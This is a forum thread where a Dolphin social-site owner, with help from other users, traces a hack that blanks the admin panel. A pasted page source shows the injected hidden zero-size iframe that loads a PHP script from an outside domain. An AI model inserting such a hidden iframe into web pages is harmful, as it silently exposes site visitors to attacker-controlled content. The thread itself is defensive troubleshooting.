Dolphin 7.0.4, my site was hacked and now when my admin profile clicks the crown icon on the member menu it changes to a blank screen. Mousing over the icon I see a popup with the words "Go in admin panel", the status bar says I am going to http://eastwestlove.com/administration/ and thats where the address bar at the top of the browser ends up, but the page is blank.
I suspect the hacker was trying to highjack my site to do his advertising on the banner system of my site, and wanted to keep me from accessing the admin panel so I couldn't change it back. Anyway the database doesn't seem to contain any banners that I didn't put there, but he could have deleted a file or corrupted something as he was trying to incorporate his code into one of my pages.
I have done a lot of searching to try to find the code that actually displays the admin dashboard. I found a lot that composes the page, but not the part that does the display.
Any advice on where to find that code.
Cheers.
|
Your body is set to display: none; with an iframe in it. You need to check your administration/templates/base/_sub_header.html for this code
<iframe="" width="0" height="0" style="display:none;" id="frmchkldver" src="removed;wrk=24"
oh and scan your system with a good antivirus, change all password and maybe scan your whole files on the server too
so much to do.... |
Thanks for your help.
Checked that file and no sign of any iframes. Also compared it with a version from a couple of years ago and there were no differences. In fact no files in that folder had been changed for about 2 years.
|
er.....i meant _header.html not _sub_header.html. sorry
and if the file is intact try removing this temporarily, just to see if that fixes it.
<body <bx_injection:injection_body /> >
so much to do.... |
you are definitely on the right track. I just did a source code enquiry on the blank page and it contains the whole 700 lines of page code with this iframe
<
iframewidth="0"height="0"style="display:none;"id="frmchkldver"src="http://stemcellnaturaltherapy.com/images/header.php?ftd=4950638&path=%7cpublic_html%7cadministration%7ctemplates%7cbase%7c&sys=UN&wrk=24"></iframe>
in the body code where you were talking about. Next question is where is the code composed that the section <bx_injection:injection_body /> is referring to, because I expect that that is where the hacker put his code.
|
Its in the database.
Go to phpmyadmin->sys_injections and search for key column for "injection_body"
Now, if he added that from database then you need to change your pass cuz i think someone accessed your account on server. Oh its scary
so much to do.... |
just checked db. there is no key column for "injection_body" in the sys_injections table. Is it critical and should I write it in? and what should it say.
On another note, it seems that the iframe has been hard coded. Do you know where is the code that calls the database looking for the injection_body?
|
If its not in database then it has to be in that file. Can you attach the _header.html file here.
EDIT: Oh and maybe a screenshot of the sys_injection table too :D
so much to do.... |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>__page_header__</title>
<meta http-equiv="Content-Type" content="text/html; charset=__page_charset__" />
<bx_include_css />
<bx_include_js />
__dol_images__
__dol_lang__
__dol_options__
<script defer type="text/javascript">
var site_url = '<bx_url_root />';
var aUserInfoTimers = new Array();
var glUserInfoDisabled = 'yes';
$(document).ready( function() {
$( 'div.RSSAggrCont' ).dolRSSFeed();
} );
</script>
<!--[if lt IE 7.]>
<script defer type="text/javascript" src="../inc/js/pngfix.js"></script>
<![endif]-->
__extra_js__
<bx_injection:injection_head />
</head>
<body <bx_injection:injection_body /> >
<bx_injection:injection_header />
<div id="FloatDesc"></div>
|
SQL result
Host: localhost Database: eastwes1_dol Generation Time: Mar 20, 2013 at 09:20 AM Generated by: phpMyAdmin 3.4.11.1 / MySQL 5.1.65-cll SQL query: SELECT * FROM `sys_injections` LIMIT 0, 30 ; Rows: 5
id |
name |
page_index |
key |
type |
data |
replace |
active |
1 |
flash_integration |
0 |
injection_header |
php |
return getRayIntegrationJS(true); |
0 |
1 |
3 |
banner_bottom |
0 |
banner_bottom |
php |
return banner_put_nv(4); |
0 |
1 |
4 |
banner_right |
0 |
banner_right |
php |
return banner_put_nv(3); |
0 |
1 |
5 |
banner_top |
0 |
banner_top |
php |
return banner_put_nv(1); |
0 |
1 |
6 |
banner_left |
0 |
banner_left |
php |
return banner_put_nv(2); |
0 |
1 |
|
This is very strange....need to think how the iframe is added there, in the meanwhile run scans and change passwords so much to do.... |
something ate part of my dashboard in admin years ago!
MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
LMAO Tommy we know about that for a long time. so much to do.... |
LMAO Tommy we know about that for a long time.
lol i said "years" ago lol!!
MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
And i said "long" time ago :P
lol i said "years" ago lol!!
so much to do.... |
Hey, try this download all the files from your server and download this http://www.fileseek.ca/Download/ and run a search for the string "frmchkldver". so much to do.... |
Try looking in the file inc/classes/BxDolTemplate.php
https://www.deanbassett.com |
|
ok shanky mr genius beings you are now the dashboard king... please tell me what happened to mine!??! MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
ok shanky mr genius beings you are now the dashboard king... please tell me what happened to mine!??!
LMAO
ManOfTeal.COM a Proud UNA site, six years running strong! |